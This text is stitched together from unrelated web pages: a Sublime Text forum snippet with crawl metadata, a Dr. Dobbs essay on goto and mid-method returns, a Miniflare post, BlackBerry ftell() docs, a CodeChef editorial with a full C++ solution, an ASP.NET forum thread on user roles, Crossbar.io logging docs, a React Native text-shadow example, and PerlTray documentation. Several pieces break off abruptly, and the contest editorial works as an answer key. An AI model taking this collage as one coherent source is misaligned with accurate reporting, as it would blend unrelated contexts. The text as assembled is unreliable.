RubyMine for rails development maybe worth you having a look too. For your third point have a look at github.com/ignacysokolowski/SublimeTagWrapper .
https://forum.sublimetext.com/t/newbie-questions/7482/1
CC-MAIN-2016-22
refinedweb
409
68.6
In his 15+ years of developing software, Eric Bruno has acted as technical advisor, chief architect, and led teams of developers. He can be contacted at. I've been part of software teams and projects where the leaders start by putting together a "programming standards" document. The first entry always seems to be "don't use goto" if the language in question supports it. I'll start by saying this: Aside from BASIC programs I wrote in high school, I've never used the goto keyword in any of my code. In fact, with Java, there is no goto statement. Or is there? Most programmers will agree that properly written, well-structured, code doesn't require the use of goto, and I agree with this. The problem is, if you simply state "no goto" you might as well say "no JMP command in the generated assembly code" as well. When we write and compile code, the result is assembly/machine code that the processor can execute. Even higher-level languages like Java get compiled to machine code when executed, thanks to technology such as the Hot Spot Java VM. If you've ever written assembly code, or viewed the output of a compiler, you'll notice the JMP command all over the place, usually coupled with a test for some condition. This is one way that branching and code flow control is performed in the CPU. Basically, it's the same as a goto statement, and if you subscribe to the "no goto" rule, why not eliminate it also? The answer is, if you did, you probably couldn't get any of your software to run. I use this as proof that the "no goto" rule is flawed; we need to state something more concise. It's More than Goto I've seen a lot of code that violates "no goto" rule without even using goto. For instance, if goto violates the principals of structured code, does calling return in the middle of a method violate it also? I tend to say yes, and I try to structure my code to avoid this. Look at the following as an example: private boolean processTransaction(Transaction trans) { // do some session security checking User user = trans.user; log("security check for user " + user.name); if ( user.loggedIn() == false) return false; if ( user.sessionTimeout() == true ) return false; boolean success = true; // process transaction here return success; } This method checks two things before attempting to process a transaction: First, it checks that the user is logged in; and second, it checks that the user's session hasn't timed out. If either check fails, it aborts the transaction by returning false, but it does so in two places in the middle of the method. I refer to this as a mid-method return (MMR) and there's something I don't like about it. For instance, it's not always obvious where the checks begin and end, and the actual processing occurs. In this case, the code above the checks stores the user object and logs the user's name. The code after the checks does the actual work of processing the transaction, but what if another programmer needs to modify this code? He could accidentally insert some code between the if statements, inadvertently doing some work that shouldn't be done until after all the checks are complete. In this simple example, it would be obvious to most programmers that this is wrong; but in a lot of code I've seen, it's easy to make this mistake. To resolve this, I propose that the following code is better: private boolean processTransaction(Transaction transaction) { // do some session security checking User user = trans.user; log("security check for user " + user); boolean success = false; if ( user.loggedIn() ) { if ( ! user.sessionTimeout() ) { // process transaction here } } return success; } It's now more obvious where the checks are complete and the real processing begins; the code actually draws your eyes to the right spot. Also, with only one line in the method that returns a value, you have less "mental accounting" to do as you read from top to bottom. As a pleasant side effect, it's easy to discover where the success variable is declared. (How many times have you hunted through a long method to find declarations?) Some people don't like nesting all of the if statements, but I find that this can usually be limited or avoided outright by combining related checks. The following code is an example: if ( user.loggedIn() && ! user.sessionTimeout() ) { // process transaction here } Since the user's login and session timeout status are related checks, I have no problem checking them both in the same if statement. If there were a requirement to also check the date (i.e. check that it's not Sunday), then I'd prefer to see that in a separate if statement — but that's a matter of taste. The point is that mid-method returns can be just as bad as using a goto statement in your code; they disrupt code structure, flow, and readability. However, that's not where it ends.
http://www.drdobbs.com/jvm/programming-with-reason-why-is-goto-bad/228200966
CC-MAIN-2015-32
refinedweb
855
61.26
ftell(), ftello(), ftello64() Return the current position of a stream Synopsis: #include <stdio.h> long int ftell( FILE* fp ); off_t ftello( FILE* fp ); off64_t ftello64( FILE* fp ); Since: BlackBerry 10.0.0 Arguments: - fp - The stream that you want to get the current position of. Library: libc Use the -l c option to qcc to link against this library. This library is usually included automatically. Description: The ftell(), ftello(), and ftello64() functions return the current position of the stream specified by fp. This position defines the character that will be read or written by the next I/O operation on the file. The difference between these functions is the data type of the returned position. You can use the value returned by an ftell() function in a subsequent call to fseek(), fseeko(), or fseeko64() to restore the file position to a previous value. Examples: ; } Classification: ftell() is ANSI, POSIX 1003.1; ftello() is POSIX 1003.1; ftello64() is Large-file support Last modified: 2014-06-24 Got questions about leaving a comment? Get answers from our Disqus FAQ.comments powered by Disqus
http://developer.blackberry.com/native/reference/core/com.qnx.doc.neutrino.lib_ref/topic/f/ftell.html
CC-MAIN-2017-34
refinedweb
182
67.45
Miniflare is a simulator for developing and testing Cloudflare Workers. Originally started as an open-source project, Miniflare has been adopted by Cloudflare to become part of their ecosystem. Installation per NPM: npm install -g miniflare CLI usage is really simple, and is highly configurable using one of its many flags: $ miniflare worker.js [mf:inf] Worker reloaded! (97B) [mf:inf] Listening on :8787 [mf:inf] - Alternatively you can also use it in your own JS code: import { Miniflare } from "miniflare"; const mf = new Miniflare({ script: ` addEventListener("fetch", (event) => { event.respondWith(new Response("Hello Miniflare!")); }); `, }); const res = await mf.dispatchFetch(""); console.log(await res.text()); // Hello Miniflare! 🤔 Want to get started with Cloudflare Workers? This guide by Chris Ferdinandi should get you on track.
https://www.bram.us/2021/09/27/miniflare-fully-local-simulator-for-cloudflare-workers/
CC-MAIN-2022-40
refinedweb
124
51.75
Logging in Crossbar.io¶ Crossbar’s structured logging system is present in versions 0.11 and above. Crossbar.io uses Twisted’s new Logger facilities to provide structured logging for Crossbar.io and components run inside of it. Twisted Logger¶ Twisted Logger, introduced in Twisted 15.2, provides structured logging for Python applications. Crossbar.io integrates with this and uses it internally, and your components can take advantage of it. Crossbar.io also captures stdout, so print() statements will also be captured. Writing Components that use Logger¶ A component that uses Logger is the hello example application. To set your application up for logging, import Logger from twisted.logger and instantiate it. If you have classes, making it a class attribute allows Logger to store some more information (more on that later). The Logger instance has several methods, relating to the levels of events: critical: For unhandled/unhandleable errors. error: For handled errors. warn: For warnings which may affect the component but is not an error (for example: deprecated configuration, or having to make assumptions) info: For general information messages. debug: For debugging information. These methods take at least one argument (the “format string”) which will be used to produce a textual representation of the log event. This argument follows the standard Python format string representation as in PEP-3101. Further keyword arguments can be given which will be used in the formatting. The formatting may not be done straight away – if the log event is never observed (for example, if it is a debug message, and the log observer level is set to info) the event will never be formatted into a string. This can be more efficient, as it means debug calls essentially turn into no-ops when the log level of the listener is not on debug as well. As an example, if we have a variable named counter which is set to 1, and a Logger instance at self.log, we could do the following: self.log.info("published to 'oncounter' with counter {counter}", counter=counter) This message would show up in the Crossbar logs as: 2015-08-17T13:45:10+0800 [Container 7326] published to 'oncounter' with counter 1 Log recovery at all costs¶ If your log message cannot be formatted, Logger will try and preserve as much as possible. For example, if you forgot to pass the counter keyword argument to the self.log.info call… self.log.info("published to 'oncounter' with counter {counter}") …it would produce the following in Crossbar’s log: 2015-08-17T14:22:47+0800 [Container 7676] Unable to format event {'log_logger': <Logger 'hello.hello.AppSession'>, 'log_time': 1439792567.720701, 'log_source': <hello.hello.AppSession object at 0x10af0e290>, 'log_format': "published to 'oncounter' with counter {counter}"}: u'counter' Logger will try and preserve as much information as possible, no matter what errors may occur, rather than eating the message. Class instance Loggers¶ If you make your Logger a class attribute (as in the hello example), it captures some extra information. The log_source attribute in the log event is set automatically when it is a class attribute, which points to the instance of the class that it was called from. This means that you can get information from the class instance without having to individually pass it into the log call. For example: from twisted.logger import Logger from autobahn.twisted.wamp import ApplicationSession class AppSession(ApplicationSession): log = Logger() def onJoin(self, details): self.x = "Hello Crossbar!" self.log.info("x on self is {log_source.x}") When this application component is run under Crossbar, it will produce the following log message: 2015-08-17T14:28:13+0800 [Container 7825] x on self is Hello Crossbar! Plus, when Crossbar’s logger is set to debug, each log message comes with where it came from in the log, to help trace down where errors may be occurring: 2015-08-17T13:43:52+0800 [Container 7310 hello.hello.AppSession] published to 'oncounter' with counter 2 Configuring the Crossbar logger¶ For more information on configuring the Crossbar.io logging output (for example, to turn on debug, change the output format, or write to a file), see Configuring Crossbar.io’s Logging .
https://crossbar.io/docs/Logging-in-Crossbar.io/
CC-MAIN-2019-22
refinedweb
694
56.66
Hello, I am using a NRF24L01+PA to send a signal to a drone which has a standard NRF24L01 on it. I am trying to get the best range possible. I would like to go out 1000m+ always clear line of sight. I have been doing a few tests using the simple code below that controls an LED on the drone. I can only get the MIN and LOW power levels to successfully send a signal to the receiver. In the LOW power mode I can get to about 300m successfully. I would like to figure out how I can get the MAX power level to successfully send a signal. I am using a breakout board shown below to power the transmitter and have also added a capacitor to the transmitter. I have tried to shield the transmitter as well and tried multiple channels. What is weird is that while in MAX power output I can sometimes get a signal to the receiver if I hold the antenna of the transmitter in my hand. I figured that the transmitter might be over powering the receiver with its signal. However, i took my drone out to 300m and I still wont receive a signal in MAX. Any suggestions on how I can get a consistent transmission with full power from the transmitter? TRANSMITTER #include <SPI.h> #include <nRF24L01.h> #include <RF24.h> RF24 radio(7, 8); // CE, CSN const byte address[6] = "00001"; const int button = 4; int buttonState = 0; void setup() { Serial.begin(115200); pinMode(button, INPUT); radio.begin(); radio.setDataRate(RF24_250KBPS); radio.setChannel(35); radio.setPALevel(RF24_PA_LOW); radio.openWritingPipe(address); } void loop() { buttonState = digitalRead(button); if (buttonState == HIGH) { radio.openWritingPipe(address); radio.write(&buttonState, sizeof(buttonState)); } Serial.println(buttonState); } RECEIVER #include <SPI.h> #include <nRF24L01.h> #include <RF24.h> RF24 radio(7, 8); // CE, CSN const byte address[6] = "00001"; int buttonState = 0; int ledpin = 10; void setup() { Serial.begin(115200); pinMode(ledpin, OUTPUT); radio.begin(); radio.setDataRate(RF24_250KBPS); radio.setChannel(35); radio.openReadingPipe(1, address); radio.startListening(); } void loop() { if (radio.available()) { radio.read(&buttonState, sizeof(buttonState)); if (buttonState == HIGH) { analogWrite(ledpin, 600); Serial.println("Receiving!"); delay(200); } } else { analogWrite(ledpin,630); Serial.println("No Signal"); delay(10); } }
https://forum.arduino.cc/t/nrf24l01-pa-max-power-output-not-working/505700
CC-MAIN-2022-40
refinedweb
370
52.36
Bummer! This is just a preview. You need to be signed in with a Basic account to view the entire video. I've added a plain Ruby method called "page_content" to the app. It loads the contents of a text file and returns them as a string. You pass the title of a page to it as an argument, and it uses the "read" method on the core Ruby "File" class to open a ".txt" file from a "pages/" subdirectory within your app's main directory. We've added a page_content method to the app to read contents of a wiki page from a file: def page_content(title) File.read("pages/#{title}.txt") rescue Errno::ENOENT return nil end Here's a quick explanation of page_content's code... Ruby has a core class named File that's used for working with files. File is a subclass of the IO class, so File inherits a class method named read. File.read lets you read the entire contents of a file into a string, using only the file name. You can read more about it here in the IO.read documentation. If the requested file isn't found, the call to File.read may raise an Errno::ENOENT exception. Normally, this would just cause processing of the HTTP request to stop in its tracks. But if we add begin and end keywords before the call that might raise an exception (or, in this case, we can skip begin and end because the code is inside a method), and add a rescue keyword, we can "rescue" our program from being halted by the exception. You can learn more about rescuing exceptions here. - 0:00 I've added the plain Ruby method called page content to the app. - 0:04 You can type in the code you see here if you want. - 0:06 But if you launch a workspace from this video's page, - 0:09 you'll get a workspace with this method already set up for you. - 0:12 The page content method loads the contents of a text file and - 0:16 returns them as a string. - 0:18 You pass the title of a page to it as an argument and - 0:21 it uses the read method on the core Ruby file class to open - 0:24 a .txt file from a pages sub directory within your apps main directory. - 0:29 Check the teacher's notes if you'd like to know more about the file.read method. - 0:33 If the file isn't found, file.read will raise this Errno ENOENT exception. - 0:39 So we put this rescue clause here that will intercept that error if it happens - 0:43 and just return nil. - 0:45 So if the file isn't there, we just won't get anything back. - 0:48 Now we need the page's sub directory with text file for it to load from. - 0:52 So I'll create it in folder. - 0:57 Name it pages. - 1:00 And then create a new file within it. - 1:04 This file will hold a bio for one of our Treehouse teachers, Nick Pettit. - 1:08 So I'll name it Nick Pettit.txt. - 1:14 The file name has to end with a .txt extension because that's what the page - 1:17 content method will be looking for. - 1:20 For the file contents, I'll just put Treehouse teacher and game developer. - 1:30 Now let me copy this page content method to a new file all by itself, so - 1:33 I can show you how it works. - 1:35 We'll create a new file, name it test.rb. - 1:41 There's no need to require the Sinatra library since it's not used by any - 1:44 of this code. - 1:46 Now I'll add a call to the method and print the return value. - 1:49 So put this page content and we'll get an argument of - 1:56 Nick Pettit, that's the name of the text file without the txt extension. - 2:03 I didn't include the .txt on the end because page content adds that itself. - 2:08 If you launch the workspace that comes with this video, - 2:10 we'll ensure all that's set up for you. - 2:13 Now let's go to our console and try running this. - 2:15 Ruby space test.rb and they'll load the contents of the text file and print them. - 2:22 Don't worry if you don't understand every detail of how the page - 2:25 content method works. - 2:26 That's just what we're using for this particular app and - 2:29 it's not essential to understanding Sinatra. - 2:31 There's more info in the teacher's notes if you want it. - 2:35 We don't have any further need for the test our ,rb file right now. - 2:39 So I'm going to delete it from my workspace.
https://teamtreehouse.com/library/loading-text-files
CC-MAIN-2020-24
refinedweb
854
82.34
Last Updated on December 12, 2020. Text component in React Native appears to be simple but it has a lot of props for customization and usability. Sometimes, we want to make Text component more stylish by having shadows with vibrant colors. In such cases, you don’t need to rely on any third party component libraries- react native text itself has such features. All you need to use are three style props of text – textShadowColor, textShadowRadius, and import React from 'react'; import {Text, View} from 'react-native'; const App = () => { return ( <View style={{flex: 1}}> <View> <Text style={{ fontSize: 48, color: 'red', textShadowColor: 'rgba(0, 0, 0, 0.75)', textShadowOffset: {width: 1, height: 1}, textShadowRadius: 20, }}> React Native For You </Text> </View> </View> ); }; export default App; Following is the output of this react native example. That’s how you add shadows to Text in react native.
https://reactnativeforyou.com/how-to-add-shadows-for-text-component-in-react-native/
CC-MAIN-2021-31
refinedweb
145
59.74
PROBLEM LINK: Practice Contest[Division 1] Contest[Division 2] Author: Mohammad Shahhoud Editorialist: Darshan Sen DIFFICULTY: EASY PREREQUISITES: PROBLEM: Given 2 strings S and R, find the lexicographically smallest permutation of R s.t.: all substrings of S \subseteq all substrings of R QUICK EXPLANATION: Remove the characters of S from R, sort the remaining characters of R and finally inject S into the formed string in its appropriate position. SOLUTIONS: A necessary and sufficient condition for the required permutation of R to exist is when it contains S as a substring in it. The reason is that, all the substrings of S are already included in S. We break down our work into a few cases. Case 1 |R| < |S| Here the solution doesn’t exist as, to have all substrings of S in all substrings of R, R must be atleast of the size of S. Hence, the required permutation is "Impossible". Case 2 |R| \geq |S| We store the frequency of each character in S and R in 2 containers, S_{frequency} and R_{frequency} respectively. Since we know that S must appear as a substring in the solution permutation of R, we first remove the characters of S_{frequency} from R_{frequency}. Case 2.1 If we get a negative result when we subtract the frequency of a character present in S from R_{frequency}, it means that R does not possess the sufficient quantity of the character, which is contained in S. Hence, the required permutation is "Impossible". Case 2.2 Now that we have successfully removed the characters of S from R_{frequency}, we generate a string by forming a sequence of ordered clusters of the characters denoted by R_{frequency} and inject S in the correct position. We do this by first finding the first character in S that differs from S_0. If it is lesser than S_0, we inject S in the beginning of the S_0 cluster or else, we append it to the S_0 cluster. Time Complexity O(max(|R|, |\sum|)) Editorialist's Solution #include <iostream> std::string S, R; std::string solve (void ) { // store sizes int S_size = S.size(); int R_size = R.size(); if (R_size < S_size) { /* because to have S as a substring in R, R must be larger than or the same size as S*/ return "Impossible"; } else { /* frequency to store the count of characters in S and R */ int S_frequency[26]; int R_frequency[26]; // filling with 0 initially std::fill(S_frequency, S_frequency + 26, 0); std::fill(R_frequency, R_frequency + 26, 0); // filling in the frequencies for (int i = 0; i < S_size; ++i) ++S_frequency[int(S[i] - 'a')]; for (int i = 0; i < R_size; ++i) ++R_frequency[int(R[i] - 'a')]; /* To have all the substrings of S in the set of all substrings of R, it would be sufficient to have just S as a substring in R. */ /* To find the lexicographically minimum of such permutations of R, we simply keep all the remaining characters of R sorted and inject string S into its appropriate position. */ /* There is however one more thing we should be worried about. Where exactly do we inject S if there exists a cluster of characters( = S[0]) in R? Well, going by the definition of the lexicographical order, we find the first character in S that differs from S[0]. If it is lesser that S[0], we place S in the beginning of the cluster. In the other case, we put it at the end.*/ // removing the obvious characters of S from R for (int i = 0; i < 26; ++i) { R_frequency[i] -= S_frequency[i]; if (R_frequency[i] < 0) { /* R doesn't have as many number of character char('a' + i) as S. */ return "Impossible"; } } /* temp_ch stores the first character in S that differs from S[0] */ char temp_ch = S[0]; for (int i = 0; i < S_size; ++i) { char ch = S[i]; if (ch != temp_ch) { temp_ch = ch; break; } } /* res stores the result and is initialized with the empty string*/ std::string res; /* We append all the characters < S[0] to res in a sorted order. */ for (char ch = 'a'; ch < S[0]; ++ch) { int id = int(ch - 'a'); while (R_frequency[id]--) res = res + ch; } if (temp_ch < S[0]) { // S chould come before the cluster of S[0]'s // we first append S to the result res += S; // then we append the cluster of S[0]'s int temp_id = int(S[0] - 'a'); while (R_frequency[temp_id]--) res = res + S[0]; } else { // the cluster of S[0]'s should come before S // we first append the cluster of S[0]'s int temp_id = int(S[0] - 'a'); while (R_frequency[temp_id]--) res = res + S[0]; // then we append S to the result res += S; } /* We append all the remaining characters < S[0] to res again in a sorted order. */ for (char ch = char(1 + S[0]); ch <= 'z'; ++ch) { int id = int(ch - 'a'); while (R_frequency[id]--) res = res + ch; } return res; } } int main (void ) { int N; std::cin >> N; while (N--) { std::cin >> S >> R; std::cout << solve() << std::endl; } return 0; }
https://discuss.codechef.com/t/allsum-editorial-unofficial/39530
CC-MAIN-2020-40
refinedweb
845
52.02
Dec 04, 2011 05:30 PM|multiv123 06:04 PM|francesco abbruzzese 06:35 PM|multiv123 07:53 PM|francesco abbruzzese 08:21 PM|multiv123 08:27 PM|multiv123 09:57 PM|francesco abbruzzese|LINK sorry I made a mistake, u is MyUse, not MembershipUser @foreach (MyUser u in Model.AllUsers){ ......some user property rendered here @foreach (string role in u.UserRoles) { .....a role of user rendered here } } Dec 04, 2011 10:04 PM|multiv123|LINK Thanks. I'm using a ContactListViewModel already with the view and using MyUser is giving an error: CS0246: The type or namespace name 'MyUser' could not be found (are you missing a using directive or an assembly reference?) Dec 04, 2011 10:08 PM|francesco abbruzzese. Dec 04, 2011 10:16 PM|francesco abbruzzese|LINK It is likely that MyUser is defined in a namespace that is not included in the View. See what the name of the Namespace is and add @using namespaceName Dec 04, 2011 11:21 PM|francesco abbruzzese 10:25 AM|francesco abbruzzese|LINK See if also roles is null. If not there is a type mismatch between allRoles and roles, I suspect the first one is just an IEnumerable, while the secondone is an IEnumerable<MembershipUser>. Dec 05, 2011 09:18 PM|francesco abbruzzese|LINK Create a List<MyUser>, sat MyList and in a foreach loop on roles add all MyUSer contained in roles to MyList, wuth something like MyList.Add(currItem) then put this list as value of AllUsers. Dec 05, 2011 09:32 PM|multiv123 09:40 PM|francesco abbruzzese Dec 05, 2011 09:58 PM|francesco abbruzzese|LINK YOU DON'T NEED THIS IN THE VIEW!!! I suggested to use the list in the controller as for my previous post All-Star 151752 Points Moderator MVP Dec 05, 2011 09:58 PM|ignatandrei|LINK multiv123 AllUsers = MyList.Add(currItem); it says AllUsers' does not exist in the current context maybe it does not exists. Where it exists? Dec 05, 2011 10:10 PM|multiv123|LINK AllUsers is in MyViewModel.cs file: public IEnumerable<MyUser> AllUsers { get; set; } I have included the namespace at the top of the List.cshtml file, but it doesn't seem to be able to find the AllUsers... Also I tried commenting out the line in the forloop with AllUsers and also the Model.AllUsers in the foreach condition doesn't seem to work. All-Star 151752 Points Moderator MVP Dec 05, 2011 10:56 PM|ignatandrei|LINK multiv123 AllUsers is in MyViewModel.cs file: public IEnumerable<MyUser> AllUsers { get; set; } I have included the namespace at the top of the List.cshtml file, but it doesn't seem to be able to find the AllUsers And you want to invoke where ?! I think you have to make a new instance of MyViewModel class Participant 1247 Points 26 replies Last post Dec 06, 2011 01:01 PM by JonLWright
http://forums.asp.net/p/1746171/4714752.aspx?Re+showing+user+roles+for+users+in+database
CC-MAIN-2014-10
refinedweb
487
61.56
perltray - Convert Perl program into a Windows tray application perltray [options] perlscript perltray [options] project perltray perltray --help perltray --version The PerlTray utility converts a Perl program into a Windows tray application. This utility combines a Perl program, all of the required Perl modules and a modified Perl interpreter into one binary unit. When the resulting application is run, it searches for modules within itself before searching the filesystem. Most commonly, PerlTray is invoked with the name of the Perl program that you want converted as an argument. This produces a working application. Some of the options described below make it possible to control which modules are included and how the generated application behaves. If PerlTrayTray replaces each one of these with the arguments parsed from the corresponding file. perltrayTray::get_bound_file()and PerlTray:Tray::extract_bound_file()function. File permissions must be specified as an octal number (0555 by default); PerlTrayTray:Tray command-line option (for freestanding applications). For example: perltray -Tray. perltray -Tray explain all files it includes. --dependentoption to built a non-freestanding application. perltray --help FUNCTIONS perltray -. The first icon is used as the default icon. The others can be used at runtime using the SetAnimation() and SetIcon() APIs.Tray will automatically add architecture and version specific subdirectories the same way the Perl -I option and the Perl lib pragma do. The content of the PERL5LIB environment variable is automatically added via an implicit --lib option. STDOUTand STDERRwill be visible in the console window. -Tray:Tray is assumed to be the input script filename. Thus perltray myscript.pl ...is equivalent to: perltray -. Singleton()callback) and terminates immediately. The default singleton name is the application name itself. Note: PerlTrayTray. They are available via the PerlApp:: namespace in addition to PerlTray::, to simplify sharing modules between PerlApp applications and PerlTray applications. my $datafile = "data.txt"; my $filename = PerlTray:Tray::get_bound_file("data.txt")) { # ... process $line ... } If the file is not bound, get_bound_file() returns undef in scalar context or the empty list in list context. The following functions are automatically exported by the PerlTray module: use PerlTray; Balloon(INFO, TITLE, ICON, TIMEOUT) The Balloon() function displays a balloon tooltip for TIMEOUT seconds. The balloon displays the INFO text and TITLE title. In addition, one of these icons can be specified: "info", "warning", "error". Windows limits the range of the timeout value to between 10 and 30 seconds. For example, if you specify a value of '2', Windows displays the balloon for 10 seconds. Only one tooltip can display on the taskbar at any one time. If an application attempts to display a tooltip while another is already displayed, the tooltip will not display until the already-displayed tooltip has been visible for its miminum TIMEOUT value (10 seconds). For example, if a tooltip with a TIMEOUT value of 20 seconds is displayed, and another application attempts to display a tooltip 5 seconds later, the initial tooltip will continue to display for another 5 seconds before it is replaced by the second tooltip. DisplayMenu() The DisplayMenu() function displays the popup menu at the current cursor position. This function is typically invoked via a hotkey callback. Download(URL, CALLBACK) The Download() function asynchronously downloads a file from a (ftp or http) URL. CALLBACK must be either a string or a code reference. It is evaluated or called when the download is complete. At that time $_ is set to the file content, or undefined if the download was not successful. Execute(APPLICATION) The Execute() function starts an APPLICATION. This can be a program name, an document filename, or a URL. An "http:" URL opens the browser and a "mailto:" URL opens the email client. The Execute() function works similar to the shell "start" command. MessageBox(TEXT, CAPTION, FLAGS) The MessageBox() function displays a modal dialog box with the message TEXT. While the dialog is displayed, the tray menu is disabled. Clicking on the tray icon brings the message box to the foreground and gives it the input focus. CAPTION specifies the message box title. The default is "PerlTray". The FLAGS parameter specifies the type of message box. The default is a box with a single OK button without an icon. Choose the number and types of buttons from the following table: One of the following four icons can be added to the message box: Normally, the first button in the message box is the default button. Use one of the following flags to make the second or third button the default: The function returns the id of the selected push button: Sample code: my $flags = MB_YESNO | MB_ICONQUESTION | MB_DEFBUTTON2; my $ans = MessageBox("Shutdown?", "MyApp", $flags); if ($ans == IDYES) { # ... } RegisterHotKey(HOTKEY, CALLBACK) This function registers a global Windows hotkey and invokes the CALLBACK whenever the HOTKEY is pressed. Hotkeys cannot be undefined, and should not be redefined once they are registered. The HOTKEY definition is a string of modifiers followed by a key code. Valid modifiers are "ALT", "CTRL", "SHIFT", and "WIN". Modifiers and key code are separated with a "+" sign, e.g. 'Alt'+'Ctrl'+'F8'. Valid keycodes are letters and digits, "F" followed by a function key number (1-24), "N" followed by a numeric keypad number (0-9) or one of the following strings: back backspace tab clear return enter pause capital capslock esc escape space spacebar blank prior pageup pgup next pagedown pgdn end home left up right down select print execute snapshot printscreen prtscn insert delete help sleep numlock scroll scrolllock It is also possible to specify a VK_* constant as a "hex string", e.g. 'Alt'+'0x1b'. Please see the Microsoft documentation for a list of virtual key codes. The CALLBACK can be either a string to be evaluated or a CODE reference to be called. Sample code: RegisterHotKey("alt+0x1b", \&show_balloon); RegisterHotKey("alt+home", "MessageBox('Foo')"); RegisterHotKey("alt+F2", "DisplayMenu()"); RegisterHotKey("win+2", \&DisplayMenu); SetAnimation(DURATION, FREQUENCY, ICONS) The SetAnimation() function animates the tray icon by cycling through all icons in the ICONS list for DURATION milliseconds. The icon is changed every FREQUENCY milliseconds. After DURATION milliseconds the previous tray icon is restored. Please check the documentation of SetTimer() for additional ways to specify the DURATION and FREQUENCY times. SetIcon(ICON) The SetIcon() function changes the tray icon to ICON. ICON must be the name of one of the icons bundled with the PerlTray application with the --icon option, but without the ".ico" extension. SetIcon() terminates any icon animation that may be in progress. SetTimer(ELAPSE, CALLBACK) The SetTimer() function starts an asynchronous timer, which invokes the CALLBACK every time ELAPSE milliseconds have expired. Calling SetTimer() Note that timers may not trigger if the system time is changed before the ELAPSE time has elapsed. The TimeChange() callback can be used to catch this situation and restart the timers. The following callback functions are automatically invoked by PerlTray if they are defined: Click() The Click() callback is invoked when the user clicks on the tray icon. PerlTray will not call the Click() callback when the click is part of a double-click. The default action for the Click() callback is to display the popup menu. The return value of the Click() callback is ignored. DoubleClick() The DoubleClick() callback is invoked when the user double-clicks on the tray icon. The default action for the DoubleClick() callback is to execute the default action defined by the popup menu. The return value of the DoubleClick() callback is ignored. PopupMenu() The PopupMenu() callback is invoked whenever the user clicks on the tray icon to invoke the context menu. It must return a reference to an array of menu item definitions. Each menu item definition is a reference to an array of up to three elements: the LABEL, the ACTION and, sometimes, a CONDITION. For example: ["*Active&State", "Execute ''"], The LABEL contains the menu text. The menu item can be marked as the default item by prefixing the LABEL with an asterisk. It is then displayed in bold automatically executed when the user double-clicks on the menu. An ampersand in the LABEL indicates that the next character is the keyboard shortcut. A tab character can be used to divide the menu into a left and right column (the right is typically used to display keyboard shortcuts). The ACTION entry may contain a variety of types. A code reference is called when this menu item is selected. A string is evaluted as Perl code. Note that any variables referenced in string actions should be package variables. Lexicals will not be visible. An empty string or undefined value as the ACTION disables the menu item and grays out the LABEL. If the ACTION field is missing altogether, the ACTION of the previous menu item is inherited. The variable $_ is set to the LABEL before executing the ACTION. This makes it easy to share a single action among multiple menu items. If th menu LABEL contains a colon, the part of the LABEL after the colon is assigned to $_ instead. A LABEL containing only dashes indicates a separator line. To create a submenu, set the ACTION field to a reference to an array of menu item definitions. Menu items can also act as radiobuttons. Prefix the LABEL with "o " or "x " for unselected and selected radiobuttons and use a scalar variable reference as the ACTION. For example: ["o Fast :50", \$freq], ["x Medium :100"], ["o Slow :200"], PerlTray sets the ACTION variable to the LABEL value of the "x" clause if the variable is not yet defined. Every time the menu is displayed, PerlTray compares the value of the ACTION variable to each LABEL to determine which button is currently selected. Alternatively, the optional CONDITION element can be used to specify which element is selected: ["o Fast", '$freq = 50', $freq==50], ["o Medium", '$freq = 100', $freq==100], ["o Slow", '$freq = 200', $freq==200], PerlTray also supports checkmarked menu items. Prefix the label with "_ " or "v " for unchecked and checked items. Actions as scalar references work slightly differently from radiobuttons: the variable is set to the LABEL text if it is undefined. If it is already defined (any value), it is set to undefined. This way it toggles between undefined and the LABEL text. A defined value means that the menu gets a checkmark. ["v Checked", \$check], The third CONDITION argument can once again be used in more complex situations to specify the checked state. Shutdown(LOGOFF) The Shutdown() function is called immediately before the application is terminated. It is not possible to abort the termination at this point. The LOGOFF argument is true if the session ends because the user is logging off. It is false during system shutdown. Singleton(ARGV) If the PerlTray application has been built using the --singleton option, only a single instance is allowed to run. Each additional instance forwards the command-line parameters to the Singleton() callback of the instance that is already running and then terminates immediately. TimeChange() The Timer() callback is called whenever the system time is changed. The return value of this callback is ignored. Timer() The Timer() callback is the default callback for the SetTimer() function. The return value is ignored. ToolTip() The Tooltip() function is called whenever the mouse cursor hovers over the tray icon. It must return a string value, which will be displayed as a tooltip. The default implementation returns "PerlTray" The following predefined variables are available to the application created by PerlTray. All PerlTray:: variables documented here are also available via the PerlApp:: namespace $PerlTray::BUILDvariable contains the PerlTray build number. $PerlTray::PERL5LIBvariable contains the value of the PERL5LIB environment variable. If that does not exist, it contains the value of the PERLLIB environment variable. If that one does not exists either, $PerlTray::PERL5LIBis undef. $PerlTray::RUNLIBvariable contains the fully qualified path name to the runtime library directory specified by the --runliboption. If the --norunliboption is used, this variable is undef. $PerlTray::TOOLvariable contains the string: "PerlTray", indicating that the currently running executable has been produced by the PerlTray tool. $PerlTray::VERSIONvariable contains the PerlTray version number: "major.minor.release", but not including the build number. When the application built with PerlTrayTrayTray uses the PERLTRAY_OPT environment variable to set default command-line options. PerlTray treats these options as if they were specified at the beginning of every PerlTray command line. Note: Perl must be in your PATH if you want to use PERLTRAY_OPT. All directories specified in the PERL5LIB environment variable are treated as if they had been specified with the --lib command-line option. Therefore modules located in PERL5LIB directories will be included even in dependent applications. If PERL5LIB is not set, PerlTray will use the value of PERLLIB instead (just like regular Perl). PerlTray will pipe the output of perltray --help through the program specified in the PAGER environment variable if STDOUT is a terminal. The following environment variables are not visible to the application built with PerlTray: PERL5LIB, PERLLIB, PERL5OPT, PERL5DB and PERL5SHELL. The temporary extraction directory is automatically added to the PATH environment variable when a file is bound using the [extract] option. When PerlTray can't locate a module that seems to be used or required by the application, it produces an error message: VMS\Stdio.pm: warn: Can't locate VMS\Stdio.pm refby: C:\perl\lib\File\Temp.pm In general, PerlTrayTray includes a number of platform-specific rules telling it that certain dependencies are likely not required. In those cases, the error messages are downgraded to a warning. In all other cases it is the responsibility of the user to verify if the module is needed or not. PerlTrayTrayTray internally uses a case-sensitive file name lookup and otherwise does not load the file at runtime. PerlTrayTray. The first thing PerlTray needs to do is to determine which modules and external files the converted script depends upon. The PerlTray program starts out by scanning the source code of the script. When it finds occurrences of use, do or require, it tries to locate the corresponding module and then parse the source of that module. This continues as long as PerlTray finds new modules to examine. PerlTray does not try to run the script. It will not automatically determine which modules might be loaded by a statement such as: require $module; In cases like this, try listing additional modules to traverse with the --add option. The PerlTray program has some built-in heuristics for major Perl modules that determine additional modules at runtime, like DBI, LWP, Tk. PerlTray anticipates which additional modules are required so that they are available in freestanding executables. PerlTrayTray::VERSION variable. It will be set to the version number of PerlTrayTrayTray running with an evaluation license expires when the evaluation license times out. Use the --version option to view the time limit of your current license. perl(1) PerlTray is part of the Perl Dev 